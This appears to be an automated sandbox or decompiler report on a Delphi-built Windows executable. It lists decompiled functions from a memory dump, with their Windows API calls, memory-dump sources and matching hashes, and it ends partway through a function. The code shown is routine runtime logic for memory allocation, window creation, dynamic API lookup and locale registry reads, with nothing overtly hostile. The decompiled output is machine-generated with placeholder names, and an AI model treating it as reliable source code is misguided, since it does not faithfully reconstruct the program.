                                  			E0049E4F4(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				CHAR* _t22;
                                  				struct HINSTANCE__* _t23;
                                  				CHAR* _t26;
                                  				intOrPtr _t31;
                                  				intOrPtr* _t34;
                                  				void* _t37;
                                  
                                  				_t34 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				E00404888(_v8);
                                  				E00404888(_v12);
                                  				_push(_t37);
                                  				_push(0x49e589);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t37 + 0xfffffff8;
                                  				_t26 = E00404898(_v8);
                                  				LoadLibraryA(_t26); // executed
                                  				 *0x4bccb4 = GetModuleHandleA(_t26);
                                  				if( *0x4bccb4 != 0) {
                                  					0;
                                  					0;
                                  					_t22 = E00404898(_v12);
                                  					_t23 =  *0x4bccb4; // 0x70600000
                                  					 *_t34 = GetProcAddress(_t23, _t22);
                                  				}
                                  				_pop(_t31);
                                  				 *[fs:eax] = _t31;
                                  				_push(0x49e590);
                                  				return E004043FC( &_v12, 2);
                                  			}












                                  APIs
                                  • LoadLibraryA.KERNEL32(00000000), ref: 0049E532
                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0049E589), ref: 0049E53A
                                  • GetProcAddress.KERNEL32(70600000,00000000,00000000,00000000,00000000,0049E589), ref: 0049E567
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AddressHandleLibraryLoadModuleProc
                                  • String ID:
                                  • API String ID: 310444273-0
                                  • Opcode ID: 02abbfa3be8336596ffbbf129f8e44e0f385e086389595b4da41da46cb3beb9e
                                  • Instruction ID: e6ce9a76aaa037106e1219a45c28da37e0540df83f0bec9e0e256ddc7eeeb9d6
                                  • Opcode Fuzzy Hash: 02abbfa3be8336596ffbbf129f8e44e0f385e086389595b4da41da46cb3beb9e
                                  • Instruction Fuzzy Hash: E10175B5504248AFD700FFB5CC8295D7BFCEB49314F52487AB904E3291EB385D008618
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00401C34: RtlInitializeCriticalSection.KERNEL32(004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C4B
                                    • Part of subcall function 00401C34: RtlEnterCriticalSection.KERNEL32(004BC5CC,004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C5E
                                    • Part of subcall function 00401C34: LocalAlloc.KERNEL32(00000000,00000FF8,004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C88
                                    • Part of subcall function 00401C34: RtlLeaveCriticalSection.KERNEL32(004BC5CC,00401D03,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401CF6
                                  • RtlEnterCriticalSection.KERNEL32(004BC5CC,00000000,0040262C), ref: 004024D9
                                  • RtlLeaveCriticalSection.KERNEL32(004BC5CC,00402633), ref: 00402626
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                  • String ID:
                                  • API String ID: 2227675388-0
                                  • Opcode ID: 536ab81e7a0168c150257fa6abde368d4904b7c8e39b364701b024b2e632bd7d
                                  • Instruction ID: c346414b2df36dfc1d78c9a94266e18d2ac5f313e2888cde79dd59751a18ab5d
                                  • Opcode Fuzzy Hash: 536ab81e7a0168c150257fa6abde368d4904b7c8e39b364701b024b2e632bd7d
                                  • Instruction Fuzzy Hash: 5D512FB5A00205EFDB10CF69DAC5A6EBBF1FB48314F24827AD444A73E1D378A941CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401838(signed int __eax, intOrPtr* __ecx, void* __edx) {
                                  				signed int _v20;
                                  				void* _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				intOrPtr _t20;
                                  				void* _t35;
                                  				intOrPtr* _t39;
                                  				intOrPtr* _t48;
                                  				void** _t49;
                                  				signed int* _t50;
                                  				void** _t51;
                                  
                                  				_t51 =  &_v24;
                                  				_t39 = __ecx;
                                  				 *_t51 = __edx;
                                  				_t49 =  &_v32;
                                  				_t48 =  &_v36;
                                  				_t50 =  &_v28;
                                  				_v24 = __eax & 0xfffff000;
                                  				_v20 =  *_t51 + __eax + 0x00000fff & 0xfffff000;
                                  				 *__ecx = _v24;
                                  				 *((intOrPtr*)(__ecx + 4)) = _v20 - _v24;
                                  				_t20 =  *0x4bc5ec; // 0x2641b4
                                  				 *_t48 = _t20;
                                  				while(0x4bc5ec !=  *_t48) {
                                  					_t10 =  *_t48 + 8; // 0x0
                                  					 *_t49 =  *_t10;
                                  					 *_t50 =  *((intOrPtr*)( *_t48 + 0xc)) +  *_t49;
                                  					if( *_t49 < _v24) {
                                  						 *_t49 = _v24;
                                  					}
                                  					if( *_t50 > _v20) {
                                  						 *_t50 = _v20;
                                  					}
                                  					if( *_t49 <  *_t50) {
                                  						_t35 = VirtualAlloc( *_t49,  *_t50 -  *_t49, 0x1000, 4); // executed
                                  						if(_t35 == 0) {
                                  							 *_t39 = 0;
                                  							return 0;
                                  						}
                                  					}
                                  					 *_t48 =  *((intOrPtr*)( *_t48));
                                  				}
                                  				return 0x4bc5ec;
                                  			}
















                                  APIs
                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004018D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID: dA&
                                  • API String ID: 4275171209-2347778391
                                  • Opcode ID: 150826bb40592e65ffcf6e1f8b672396795f8f1a2a44fe53c5a1e581b5545d04
                                  • Instruction ID: b9a4ff5faeac863311b4874415b1ca978e19cbac31c1212781f626a121146fc5
                                  • Opcode Fuzzy Hash: 150826bb40592e65ffcf6e1f8b672396795f8f1a2a44fe53c5a1e581b5545d04
                                  • Instruction Fuzzy Hash: E721DDB5604246DFC750DF2CC880A5AB7E4FF98350F24892AF998DB394E334EA44CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040142C() {
                                  				void* _v8;
                                  				intOrPtr* _v12;
                                  				void* _t20;
                                  				intOrPtr _t23;
                                  				void _t28;
                                  				intOrPtr* _t34;
                                  
                                  				_t34 =  &_v12;
                                  				if( *0x4bc5e8 != 0) {
                                  					L5:
                                  					_v12 =  *0x4bc5e8;
                                  					 *0x4bc5e8 =  *_v12;
                                  					 *_t34 = _v12;
                                  				} else {
                                  					_t20 = LocalAlloc(0, 0x644); // executed
                                  					_v8 = _t20;
                                  					if(_v8 != 0) {
                                  						_t28 =  *0x4bc5e4; // 0x263b80
                                  						 *_v8 = _t28;
                                  						 *0x4bc5e4 = _v8;
                                  						_t23 = 0;
                                  						do {
                                  							_t7 = (_t23 + _t23) * 8; // 0x4
                                  							_v12 = _v8 + _t7 + 4;
                                  							 *_v12 =  *0x4bc5e8;
                                  							 *0x4bc5e8 = _v12;
                                  							_t23 = _t23 + 1;
                                  						} while (_t23 != 0x64);
                                  						goto L5;
                                  					} else {
                                  						 *_t34 = 0;
                                  					}
                                  				}
                                  				return  *_t34;
                                  			}










                                  APIs
                                  • LocalAlloc.KERNEL32(00000000,00000644), ref: 00401441
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AllocLocal
                                  • String ID: dA&
                                  • API String ID: 3494564517-2347778391
                                  • Opcode ID: ac468a2ecd9c3d128b107ecaba18d31a886b19c35e28d549204fc5674e727de6
                                  • Instruction ID: 64bd595fae1296f2545ce3df9dffd7a57d75690bade7c4963c2cae610cb39c96
                                  • Opcode Fuzzy Hash: ac468a2ecd9c3d128b107ecaba18d31a886b19c35e28d549204fc5674e727de6
                                  • Instruction Fuzzy Hash: F311C574608712EFC710DF28C5C0A1AB7E1EB89714F10C97AE889DB3A4D334AC45DB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042964C(void* __eax, void* __ecx, void* __edx) {
                                  				void* __ebx;
                                  				void* _t8;
                                  				void* _t16;
                                  
                                  				_t16 = __eax;
                                  				_t8 = E004284A4( *((intOrPtr*)(__eax + 0xc)), __eax, __ecx); // executed
                                  				SelectObject( *(_t16 + 4), _t8);
                                  				return SetTextColor( *(_t16 + 4), E00427FD0( *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc)) + 0x18))));
                                  			}







                                  APIs
                                    • Part of subcall function 004284A4: CreateFontIndirectA.GDI32(?), ref: 004285E2
                                  • SelectObject.GDI32(?,00000000), ref: 0042965C
                                    • Part of subcall function 00427FD0: GetSysColor.USER32 ref: 00427FDA
                                  • SetTextColor.GDI32(?,00000000), ref: 00429671
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Color$CreateFontIndirectObjectSelectText
                                  • String ID:
                                  • API String ID: 2338844261-0
                                  • Opcode ID: b302dbb00f3a1dd1fc2b4ad0904f1bc58baa0a317ac4faef4cd84db27569bc0e
                                  • Instruction ID: 835dba720a73490700537a1a8c9c5c8eb7b1b81763989f659865f169bb7124a0
                                  • Opcode Fuzzy Hash: b302dbb00f3a1dd1fc2b4ad0904f1bc58baa0a317ac4faef4cd84db27569bc0e
                                  • Instruction Fuzzy Hash: 4FD067B52041019FCB80EFA9E9C1D0AB3DCAF08214345C096B909DF257C639E8108728
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401694(void* __eax, void** __edx) {
                                  				void* _t3;
                                  				void** _t8;
                                  				void* _t11;
                                  				long _t14;
                                  
                                  				_t8 = __edx;
                                  				if(__eax >= 0x100000) {
                                  					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                  				} else {
                                  					_t14 = 0x100000;
                                  				}
                                  				_t8[1] = _t14;
                                  				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                  				_t11 = _t3;
                                  				 *_t8 = _t11;
                                  				if(_t11 != 0) {
                                  					_t3 = E004014B8(0x4bc5ec, _t8);
                                  					if(_t3 == 0) {
                                  						VirtualFree( *_t8, 0, 0x8000);
                                  						 *_t8 = 0;
                                  						return 0;
                                  					}
                                  				}
                                  				return _t3;
                                  			}








                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401A27), ref: 004016C3
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401A27), ref: 004016EA
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 9309d6744b3797162936d0e15a13732a100c9587312e0d51053d2c7cba719e6d
                                  • Instruction ID: 67e0a518a30daea821aaf1b18209b496136ad716dca4c447260ed954f7b0fbab
                                  • Opcode Fuzzy Hash: 9309d6744b3797162936d0e15a13732a100c9587312e0d51053d2c7cba719e6d
                                  • Instruction Fuzzy Hash: 12F02773F0062057EB20556E4CC5F535584AF85790F18457BFA08FF3E9C6BA8C0182A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E004075CA(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                  				CHAR* _v8;
                                  				void* _t13;
                                  				struct HWND__* _t24;
                                  				CHAR* _t31;
                                  				long _t38;
                                  
                                  				_push(_t31);
                                  				_v8 = _t31;
                                  				_t38 = __eax;
                                  				_t13 = E00402D64();
                                  				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E00402D54(_t13);
                                  				return _t24;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: dc3614e55f8e1df82b08a6313e53d7c703585e5f93ed3a135a24a4fb7a62d870
                                  • Instruction ID: 345a5b142ef3e3774b86c424216de0b98c217a7697f0077a0adaed55d67508b6
                                  • Opcode Fuzzy Hash: dc3614e55f8e1df82b08a6313e53d7c703585e5f93ed3a135a24a4fb7a62d870
                                  • Instruction Fuzzy Hash: 20F0E2B2700158BF8B84DE9DDC85EDB77ECEB4C264B00412AFA0CE3240D274ED108BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004075CC(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                  				CHAR* _v8;
                                  				void* _t13;
                                  				struct HWND__* _t24;
                                  				CHAR* _t29;
                                  				long _t32;
                                  
                                  				_v8 = _t29;
                                  				_t32 = __eax;
                                  				_t13 = E00402D64();
                                  				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E00402D54(_t13);
                                  				return _t24;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 6f48f4eaa7b80874825fab1aaad38068b930695a7f535d82713e1e7b48019517
                                  • Instruction ID: 84dc18e4f0b09838bf349d7c1d550884d200ef56795df12e2bd77435a6c5542b
                                  • Opcode Fuzzy Hash: 6f48f4eaa7b80874825fab1aaad38068b930695a7f535d82713e1e7b48019517
                                  • Instruction Fuzzy Hash: B5F0E2B2600158BF8B84DE9DDC85EDB77ECEB4C264B00412AFA0CE3240D274ED108BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407624(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                  				long _v8;
                                  				void* _t12;
                                  				struct HWND__* _t22;
                                  				long _t27;
                                  				CHAR* _t30;
                                  
                                  				_v8 = _t27;
                                  				_t30 = __eax;
                                  				_t12 = E00402D64();
                                  				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E00402D54(_t12);
                                  				return _t22;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 08ef12f51244633bb1c0687d1fc64d596386d324027090b1cb99a2d6d50bee88
                                  • Instruction ID: 2b84ed3dde19c1704d65383766af515d67df567bec5425a6b7b556750179a4f6
                                  • Opcode Fuzzy Hash: 08ef12f51244633bb1c0687d1fc64d596386d324027090b1cb99a2d6d50bee88
                                  • Instruction Fuzzy Hash: E3F0F4B2704258BFCB90DE9EDC85E9B7BECEB4C264B00402ABA0CD3241D174ED108BB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0040656C(intOrPtr* __eax, void* __ecx, void* __edx) {
                                  				char _v4104;
                                  				intOrPtr* _t5;
                                  				int _t12;
                                  				void* _t21;
                                  				void* _t22;
                                  
                                  				_t5 = __eax;
                                  				_t22 = _t21 + 0xfffff004;
                                  				_push(__eax);
                                  				_t20 = __edx;
                                  				_t14 = __eax;
                                  				if(__eax != 0) {
                                  					if( *((intOrPtr*)(__eax + 4)) >= 0x10000) {
                                  						_t4 = _t14 + 4; // 0xff8f
                                  						_t5 = E004045D0(__edx,  *_t4);
                                  					} else {
                                  						_t3 = _t14 + 4; // 0xff8f
                                  						_t12 = LoadStringA(E00405A30( *((intOrPtr*)( *__eax)), __ecx, __edx),  *_t3,  &_v4104, 0x1000); // executed
                                  						_t5 = E004044C8(_t20, _t12, _t22);
                                  					}
                                  				}
                                  				return _t5;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: LoadString
                                  • String ID:
                                  • API String ID: 2948472770-0
                                  • Opcode ID: 551d0454f3aab5248df355c7ec886197bd1ce30b136bb346426f7988436fcd0d
                                  • Instruction ID: a42eb82e800fa1c1cf7f29c434b97c7b14ccf972573d21dc9e41fdab9b07e095
                                  • Opcode Fuzzy Hash: 551d0454f3aab5248df355c7ec886197bd1ce30b136bb346426f7988436fcd0d
                                  • Instruction Fuzzy Hash: B9F0A0B1300610EBCB10EA9DDCC1B4A33CC9F48358B048176B608EB3D9EA78DC5147AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 16%
                                  			E00446BD0(intOrPtr* __eax, void* __edx) {
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				void* _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr* _t31;
                                  
                                  				asm("movsd");
                                  				asm("movsd");
                                  				 *((intOrPtr*)( *__eax + 0x44))();
                                  				_push( *((intOrPtr*)(__eax + 0x48)) - _v20 +  *_t31);
                                  				_push( *((intOrPtr*)(__eax + 0x4c)) - _v16 + _v32);
                                  				return  *((intOrPtr*)( *__eax + 0x84))();
                                  			}









                                  APIs
                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00446C0B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2492992576-0
                                  • Opcode ID: 3e450580647ac04c52fe3c9217b9489fe8f4b0b89d3e34e1a1c747df32f352d3
                                  • Instruction ID: 2b489bd349fd00ef9accd65a6c2d7a08998cef0b38985eff922cf8e7109b24d4
                                  • Opcode Fuzzy Hash: 3e450580647ac04c52fe3c9217b9489fe8f4b0b89d3e34e1a1c747df32f352d3
                                  • Instruction Fuzzy Hash: CDF0D4362042019FC704DF5CC8C498ABBE5FF89255F0446A8FA89CB356DA32E814CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004059E8(void* __eax) {
                                  				char _v272;
                                  				intOrPtr _t14;
                                  				void* _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t19;
                                  
                                  				_t16 = __eax;
                                  				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                  					_t3 = _t16 + 4; // 0x400000
                                  					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                  					_t14 = E00405C7C(_t19); // executed
                                  					_t18 = _t14;
                                  					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                  					if(_t18 == 0) {
                                  						_t5 = _t16 + 4; // 0x400000
                                  						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                  					}
                                  				}
                                  				_t7 = _t16 + 0x10; // 0x400000
                                  				return  *_t7;
                                  			}









                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405A06
                                    • Part of subcall function 00405C7C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,004A00A4), ref: 00405C97
                                    • Part of subcall function 00405C7C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405CB5
                                    • Part of subcall function 00405C7C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405CD3
                                    • Part of subcall function 00405C7C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CF1
                                    • Part of subcall function 00405C7C: RegQueryValueExA.ADVAPI32 ref: 00405D3A
                                    • Part of subcall function 00405C7C: RegQueryValueExA.ADVAPI32 ref: 00405D58
                                    • Part of subcall function 00405C7C: RegCloseKey.ADVAPI32(?), ref: 00405D7A
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Open$FileModuleNameQueryValue$Close
                                  • String ID:
                                  • API String ID: 2796650324-0
                                  • Opcode ID: 40ccd576ff6b02428b8365bdedf29127b821b7a5abaf49abdfba1af39e21b84e
                                  • Instruction ID: 2f7e4bde55ec2de3ee04da6a633fa8bae053b42807b2895838920d550eb3db44
                                  • Opcode Fuzzy Hash: 40ccd576ff6b02428b8365bdedf29127b821b7a5abaf49abdfba1af39e21b84e
                                  • Instruction Fuzzy Hash: BAE06D71A007148BDB10DE5CD8C1A8733D8AB09754F000AA6AC54EF386D3B8DD108BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00408A60(void* __eax, void* __edx) {
                                  				int _t3;
                                  				char* _t5;
                                  				int _t7;
                                  				int _t10;
                                  				void* _t12;
                                  
                                  				_t12 = __eax;
                                  				_t3 = E00404698(__edx);
                                  				_t5 = E00404898(__edx);
                                  				_t7 = E00404698(_t12);
                                  				_t10 = CompareStringA(0x400, 1, E00404898(_t12), _t7, _t5, _t3); // executed
                                  				return _t10 - 2;
                                  			}









                                  APIs
                                  • CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,00408AA7,?,?,00408FF9), ref: 00408A8D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CompareString
                                  • String ID:
                                  • API String ID: 1825529933-0
                                  • Opcode ID: 53a0173ed05a72329b1b182ff534bc40242ccda0b0fea2d38906e04b8ae2a7da
                                  • Instruction ID: bc28afda78b28a899c61c698d00745da579acbd4b87cddba358b3620f9a13c5f
                                  • Opcode Fuzzy Hash: 53a0173ed05a72329b1b182ff534bc40242ccda0b0fea2d38906e04b8ae2a7da
                                  • Instruction Fuzzy Hash: 55D09ED23A17112AD25076FE0C82F5A008C8B9A61AB06487AB30DF72C2D9AD8D05026D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00426074(intOrPtr _a4, intOrPtr _a8) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				char _v16;
                                  				intOrPtr _t27;
